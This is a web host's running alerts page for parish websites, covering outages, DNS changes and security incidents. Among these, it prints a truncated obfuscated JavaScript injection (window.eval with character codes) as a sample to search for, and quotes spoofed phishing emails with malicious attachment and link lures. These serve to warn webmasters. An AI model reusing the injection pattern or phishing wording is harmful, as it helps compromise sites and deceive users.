Attention - Important Information

Date:  March 20, 2016 - - Server Disk Issue

Sites are reporting that when they attempt to upload new or update existing pages, the page shows as blank and has a filesize of 0 bytes.

This is caused by our server running out of space.  This was caused by our LOG files maxing out which in turn filled up all available disk space.  ALL sites that were updated recently were affected.  CORRECTION:  We have cleared our log files which has created available disk space.  All sites that have this issue must re-post your updated pages again. This will clear all the pages that are now showing as blank.

We apologize for this inconvenience.  Please let me know if you continue to have any issues with your FTP uploads.

Also: Please review the files that you are keeping on your websites and delete files and pictures that are no longer needed.  If you wish to keep copies of your files, I would suggest that you create a GOOGLE DRIVE account (its FREE) to keep your pictures and files.   Remember, the St. Ambrose Foundation are a non profit organization supported by occational donations and we do not have unlimited disk space resources. 

Thank you..... Roy

Date:  August 27, 2014 - - EMAIL BROADCAST ISSUE

It has been brought to our attention that many organizations would like to use email broadcast or email marketing to keep its members notified of activities or issues that occur. While some sites have been creative and created scripts that allow for mass marketing email blasts through our servers, we would like to ask that because our systems are shared with many Catholic organizations, that you consider using products that are designed for such campaigns. Our servers are not designed to handle an enourmous amount of blasts, such as these. 

Our recommendation is to use known and effective email marketing services like;

www.mailchimp.com     www.campaignmonitor.com

www.emailbrain.com     www.streamsend.com

www.madmimi.com       www.benchmarkemail.com

www.getresponse.com    www.constantcontact.com

www.graphicmail.com     www.boomerang.com 

Date:  August 15, 2014 - - Many Sites Down

Our DNS Services with BIZWALA.net or remarkablehosting.net/.com have ceased to function without notice.  If you find that your site has suddenly gone down without notice, please check your domain DNS setting and change it immediately to

ns1.catholic-church.org

ns2.catholic-church.org

You must do this through your domain registrar.  When you purchased your domain name, you should have been given access to your domain control panel. This is where you change your domain DNS setting.  This setting is not on your hosted web site.

Date:  November 5, 2013 - - All Sites Down

Our Plesk license expired and needed to be updated. This resulted in the need for an emergency maintenance outage which brought all web services down for appx 12 hours.  We are now back online with full operations.  Our apologies for this interruption of service.

Date:  October 1, 2012 - - Many Sites may stop working

If you do not have the registration for your domain with Bizwala or Hosting Metro, and your site suddently stops working, you will need to change your DNS settings to

ns1.catholic-church.org

ns2.catholic-church.org

 Date:  September 26, 2012 - - Many Sites not working properly / ISSUES:

We have changed our DNS settings as a result of moving to new servers.  We are working to resolve this issue.... Pls stand by.

Date:  July 9, 2012 - - Script Virus / ISSUES:

VIRUS ALERT!!!!

We have identified a security vulnerability that we believe was the cause of the repeated attacks on our sites.  This vulnerability has been closed with the installation of the latest security patch.

As a result of these attacks, many of our hosted sites have been identified on GOOGLE as VIRUS INFECTED sites.  If you are receiving this redirection from GOOGLE, please do the following steps.

1. Carefully inspect (or replace) your index.htm or index.html files for script insertion. If you have both of these files, delete them both and install one, good file.

Note:  The virus script is usually located at the bottom of the page and looks similar to this:

=======================================

</body>
</html>
<script>/*km0ae9gr6m*/window.eval(String.fromCharCode
(116,114,121,123,112,114,111,116,111,116,121,112,101,37,50,
59,125,99,97,116,99,104,40,97,115,100,41,123,120,61,50,59,125,
116,114,121,123,113,61,100,111,99,117,109,101,110,116,91,40,
120,41,63,34,99,34,43,34,114,34,58,50,43,34,101,34,43,34,97,
34,43,34,116,34,43,34,101,34,43,34,69,34,43,34,108,34,43,34.....

========================================

2. Carefully inspect other files within your directory for this same script insertion code. (This may be how they are reinstalling the code.)
3. Look for files within your directory that have no relevance or should not be there.  If you don't know what they are for, (ie: templates, forms, counters, stats, etc) DELETE these files.
4. Request that your FTP or PLESK passwords be changed immediately.  Do not share the new password - protect it from compromise.
5. Webmasters are asked to review the documentation found at

http://www.stopbadware.org/home/security

6. Allow 7 to 10 days to pass, since you have cleaned your directories and feel that the infection has been resolved. before submitting to GOOGLE as a safe site, again.
7. Here are the steps to follow to white-list your website:

===============
1. Goto www.google.com/webmasters/tools/
2. Login using your gmail account logins.
3. Add A Site
4. Add the URL - add your domain name.
5. Click Alternative Method
6. Click Upload an html file
7. Download the HTML verification file
8. Upload the file to the document root
9. Confirm successful upload by visiting http://domain.com/filename.html in your browser
10. Click Verify
11. If the verification is successful you will receive a verification successful message

===============
Please notify us if you find further infections or issues.    R

Date:  July 1, 2012 - - Script Virus / ISSUES:

VIRUS ALERT!!!!

It has been brought to our attention that some of our hosted websites have been hit with malware scripting.

“I have checked several domains and our scans reported several pages to be infected with known javascript malware. The string "window.eval" is contained in the following files.

===========
index.html
===========

Please remove the injected code from the files.

Recommended that you reset the passwords of all accounts and scan your local machine using any updated antivirus software. If you are using any third party applications in your website, please make sure that they are secure and update them to the latest version. Once this is done, please send a request to Google to review the website.

https://support.google.com/webmasters/bin/answer.py?hl=en&answer=35179

http://support.google.com/webmasters/bin/answer.py?hl=en&answer=163633

Additional information found at
http://www.php-beginners.com/solve-wordpress-malware-script-attack-fix.html

Date:  August 15, 2011 - - EMAIL Virus / ISSUES:

VIRUS ALERT!!!!

It has been brought to our attention that our email system has been SPOOFED and is sending out a VIRUS/MALWARE as a .zip attachment. Remember, WE DO NOT EVER solicit or send emails to you EXCEPT in direct response to support or services requested.  This page is our ONLY means of notifying you of system outages due to maintenance or system failures.

The email being sent is identified as sent from
HAIRSTONDominickExlFOrQ5mH@catholic-church.org

and states:

From: HAIRSTONDominickExlFOrQ5mH [mailto:HAIRSTONDominickExlFOrQ5mH@catholic-church.org]
Sent: Monday, August 15, 2011 9:30 PM
To: wvccs@catholic-church.org
Subject: Re: FW: End of July Stat. required

Hi,
As requested I give you the open Invoices issued to you as per 30th July 2011:

Regards
Dominick HAIRSTON

----------------------------

DO NOT OPEN THE ATTACHED FILE
IN THIS EMAIL

VIRUS ALERT!!!!

Date:  November 10, 2010 - - SERVER Migration / ISSUES:

Bizwala (Our hosting service provider) has merged with Metro Hosting and as a result, have moved our services to the MH data Center.  This means that the IP addresses for all of our sites have changed.  If you are using an IP address to connect to FTP instead of the domain name, you will need to change it.  All ID's and passwords remain intact as well as PORT assignments.   Please let us know if you experience any issues.

Date:  AUGUST 1, 2010 - - SERVER CRASHED / ISSUES:

On or about July 22, 2010, our servers crashed with a File System corruption that was unrecoverable.  Bizwala moved our hosting services to another server and had to RESTORE all sites back to the latest BACKUP tapes they had.  A secondary issue existed whereby all of our hosted sites would not allow any FTP or SFTP access to any of our sites.

Tonight, I was advised that all sites are now back up with FTP for subdomains of www.catholic-church.org and SFTP for FULL domains. YOU MUST use a specific port for each type of connection which can not be published on this ALERTS page.  The PORT number for SFTP remains the same as it was, however FTP now requires a new port assignment.  You must send me a request for the new FTP port number at support@catholic-church.org .

We apologize for this increased security inconvenience, however hopefully this will help prevent further breaches of our systems and attacks on our hosted sites.

I also wanted to apologize for not updating this ALERTS page sooner, however I, along with all of you, didn't have any way to access www.catholic-church.org.

ROY........

Date:  May 11, 2010 - - SPOOF, VIRUS, & PHISHING EMAIL ISSUES:

Continuing issue, our email at support@catholic-church.org has been spoofed in an attempt to get you to open the attached link which will download a virus or phishing software, in order to get your credentials - disguised as a .ZIP file.  Here is a sample of the emails sent:

-----Original Message-----
From: catholic-church.org support [mailto:stpaulpastor@catholic-church.org]
Sent: Tuesday, May 04, 2010 12:30 PM
To: stpaulpastor@catholic-church.org
Subject: setting for your mailbox stpaulpastor@catholic-church.org are changed

SMTP and POP3 servers for stpaulpastor@catholic-church.org mailbox are changed. Please carefully read the attached instructions before updating settings.

http://groups.google.com/group/mailsv1/web/setup.zip  <<<do not click on this

DELETE THIS MESSAGE IMMEDIATELY!!  We NEVER send out these kinds of broadcast emails.  THIS ALERTS PAGE is our ONLY method for sending out alerts and notifications.  Please refer back to this page or directly with us. We will respond to specific inquiries, however never as a broadcast. 

Date:  Feb 22, 2010 - - SPOOF, VIRUS, and PHISHING EMAIL ISSUES:

Once again, our email has been spoofed in an attempt to get you to download a virus or phishing to get your credentials - disguised as a .ZIP file.  Here is the email sent:

==========start of message=================

"A new settings file for the support@catholic-church.org has just
be released "

-----Original Message-----
From: catholic-church.org Team [mailto:support@catholic-church.org]
Sent: Monday, February 22, 2010 12:50 PM
To: support@catholic-church.org
Subject: A new settings file for the support@catholic-church.org has just be released

Dear use of the catholic-church.org mailing service!

We are informing you that because of the security upgrade of the mailing service your mailbox support@catholic-church.org settings were changed. In order to apply the new set of settings open zip attached file.

Best regards, catholic-church.org Technical Support.
==========end of message=================

If you receive this email or one like it, DELETE THIS EMAIL IMMEDIATELY. WE DO NOT SEND OUT EMAILS LIKE THIS ! ! 

Date:  Nov 13, 2009 - - System UPGRADES

Over the next few weeks, our systems will be upgraded to NEW servers and software.  As a result of these upgrades, site access MAY be affected for up to 24 hours. Another result from the new systems upgrades is that Microsoft's FRONT PAGE will no longer work on our systems.  This means that if you have created pages using Front Page extension capability, you may find that your templates, buttons, dhtml, or other products that are exclusive to and rely on the Front Page extensions, may no longer work.

As you most of you are aware, with regard to access to your sites, FTP is no longer be allowed in favor of SFTP using a specified PORT. For those that are not using a FTP client that support SFTP, I recommend that you download and use the FILEZILLA (The Free FTP Solution), as it does support SFTP and is very easy to use.

Because Microsoft Front Page is no longer supported by both Microsoft and Plesk, we are recommending a WYSIWYG Web Page software tool that is FREE and very easy to use.  Please consider downloading Trellian Webpage.

If you are looking for an easy to use, FREE graphics editor, I have had some success with Paint.Net.

Date:  Nov 4, 2009 - - System Outage

Our servers ran out of DISK SPACE.  This caused many of our sites to experience a problem with uploading files. The symptom showed as you were able to connect to your site with SFTP, however uploading a file never actually started or completed. The destination file (on the server) showed as a filesize of 0.

If you were updating your "index.html" page, and it went to filesize 0,  your site was virtually inaccessible because the page showing would be BLANK.

Please make sure that you are not uploading files or pictures that are large than 100k.

Thank you...... R

Dates:  Nov 3, 2009 - Nov 13, 2009 - System Outages

Greetings from the Bizwala OPS center,

As part of our commitment to providing high-quality hosting services, maintenance has been planned to upgrade and optimize our network and servers. Both hardware and software updates will be performed.

Please read the maintenance schedule details below carefully.

Dates:  Nov 3, 2009 - Nov 13, 2009 

Components affected

- Individual Servers

- Select VPS and Nodes

- Select Switches

 Estimated downtime duration:

10 to 40 minutes of intermittent connectivity.

Our apologies for any inconvenience this may cause, and ask you to check our status update page at

http://www.bizwala.com/press/

before submitting a 'service down' support request during the above dates. If you have any questions or concerns, please do not hesitate to contact us.

Bizwala OPS Staff

10/14/2009 - SPOOF and PHISHING EMAIL ISSUES:

Phishing/Spoofing Alert:

Please be aware of a new phishing/spoofing attack proliferating the internet. We have noticed a noticeable increase in emails sent out as support@catholic-church.org  These emails are SPOOFED emails that attempt to make you think this is sent by us and turn out to be inappropriate Pharmaceutical sites, Dating services, or attempts to get you to open an attachment which contains a virus or malware code - intended to do damage to your computer or collect personal/banking information from you. [see example below] If you are getting these types of security alerts please notify us right away and please warn your parish or organization not to OPEN any emails from us unless they have specifically requested support or click on any links and/or attachments within these emails. 

Bizwala, our hosting service provider updates software directly and will never require a client to click on a link to interact with an update.  We also do not send random emails requesting information updates.

THE FOLLOWING ARE SAMPLES OF WHAT WE HAVE RECEIVED:

******* SAMPLE SPAM 1*****************

Attention!

On October 16, 2009 server upgrade will take place. Due to this the system may be offline for approximately half an hour.The changes will concern security, reliability and performance of mail service and the system as a whole.

For compatibility of your browsers and mail clients with upgraded server software you should run SSl certificates update procedure.This procedure is quite simple. All you have to do is just to click the link provided, to save the patch file and then to run it from your computer location. That's all.

 http://updates.your-domain.com

Thank you in advance for your attention to this matter and sorry for possible inconveniences.

System Administrator

******* // END SAMPLE SPAM 1*****************

******* SAMPLE SPAM 2*****************

-----Original Message-----
From: Marcia Leblanc [mailto:support@catholic-church.org]
Sent: Wednesday, October 14, 2009 3:01 PM
To: support@catholic-church.org
Subject: A new settings file for the support@catholic-church.org has just been released

Dear user of the catholic-church.org mailing service!

We are informing you that because of the security upgrade of the mailing service your mailbox support@catholic-church.org settings were changed. In order to apply the new set of settings open zip attached file.

Best regards, catholic-church.org Technical Support.

Bizwala Staff

There is an attachment named "install.zip" that is designed to damage your computer or install keylogger code to access personal or banking information. NEVER open any attachments or click on any links.

******* // END SAMPLE SPAM 1*****************

9/18/2009 - SYSTEM ISSUES :

Catholic-Church.org sites have been hit with MALWARE redirection issues and several of our sites are showing up in GOOGLE WARNING lists. These are specifically related to sites that allow ADWARE pop-ups.  If you have one of these sites please disable these pop-ups immediately.  Here are some screen shots and information regarding the latest Malware issue:  CLICK HERE

CLICK HERE for a list of known Malware Sites.

EFFECTIVE IMMEDIATELY:
ALL FTP ACCESS TO OUR WEBSITES HAS BEEN DISABLED IN FAVOR OF SFTP. YOUR ID AND PASSWORDS REMAIN INTACT, HOWEVER YOU WILL NEED TO CONTACT US FOR THE PORT NUMBER TO CONFIGURE

SFTP software can be downloaded FREE of charge from:

http://filezilla-project.org/download.php?type=client

These additional measures have been implemented to block a recent outbreak of MALWARE redirection or VIRUS attacks from recurring, however we highly recommend that you immediately change and protect your CP, FTP, or FrontPage passwords.

If you don't have the ability to Change your password, please contact us and we will reset and send your new password via email.  This email containing your new password will NOT contain the SITE name, URL, or ID credentials.  Only the new password.

Additional information regarding recent attacks and methods recommended for inspecting and protecting your sites can be found at:

http://news.cnet.com/8301-1009_3-10251779-83.html

http://blog.unmaskparasites.com/2009/05/07/gumblar-cn-exploit-12-facts-about-this-injected-script/

Additional information about SFTP can be found at:

http://www.radinks.com/sftp/FAQ.php

SITE BACKUPS: During our last attack, we were successful at recovering the index files for all sites that were identified to us, it took some time to pull these from our backup tapes and RESTORE them to the appropriate domains.  Sites where the webmaster holds a current copy of their website, merely had to reinstall the index files from their local copy and were back online in minutes.  A practice I highly recommend that all of our webmasters establish.

WEBMASTER NEED TO RETAIN A BACKUP OR COPY OF THEIR ENTIRE WEBSITE ON EXTERNAL SYSTEMS.

If you are still experiencing any issues, send us an email identifying your site and the problems you are continuing to experience

Please use the   Support   button to open a support request.

Thank you for your understanding and patience.